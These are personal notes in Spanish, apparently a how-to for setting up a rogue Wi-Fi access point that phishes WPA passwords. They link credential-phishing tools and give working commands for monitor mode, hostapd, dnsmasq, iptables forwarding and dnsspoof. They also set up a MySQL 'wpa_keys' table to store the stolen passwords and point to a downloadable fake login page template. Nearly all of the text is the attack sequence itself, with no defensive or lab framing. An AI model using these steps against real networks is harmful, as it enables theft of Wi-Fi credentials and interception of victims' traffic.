- https://github.com/tokyoneon/CredPhish
- https://github.com/m4ll0k/Atlas/blob/master/atlas.py
- https://github.com/FluxionNetwork/fluxion/wiki/Handshake-Snooper-Attack
NOTA:
Asignar ip a la tarjeta de red ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
Colocar la tarjeta en modo monitor:
airmon-ng start <IR>
Para colocar de nuevo la tarjeta en modo normal:
airmon-ng stop <IR>
Crear los dos archivos: * dnsmaq.conf * hostapd.conf
hostapd hostapd.conf
dnsmasq -C dnsmasq.conf -d
Para hacer forwarding para que los paquetes pasen:
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
Tambien debemos configurar el firewall:
# para ver las reglas
iptables -L
iptables --tables nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables --append FORWARD --in-interface <IR> -j ACCEPT
Habilitar forward de paquetes:
echo 1 > /proc/sys/net/ipv4/ip_forward
Creamos una base de datos para guardar todo:
service mysql start
mysql
create database apfake;
create user apfakeuser;
grant all on apfake.* to 'apfakeuser'@'localhost' identified by 'erik123';
use apfake;
create table wpa_keys(pass1 varchar(30), pass2 varchar(30));
alter database apfake character set 'utf8';
# Podemos consultar
select * from wpa_keys;
Vamos a la ruta del servidor web (www/html), podemos el archivo que descargamos aqui: Descargar plantilla de aqui: https://www.shellvoide.com/media/files/rogueap.zip#
Haremos uso de dnsspoof:
dnsspoof -i <IR>
Con esto tendremos todo creado.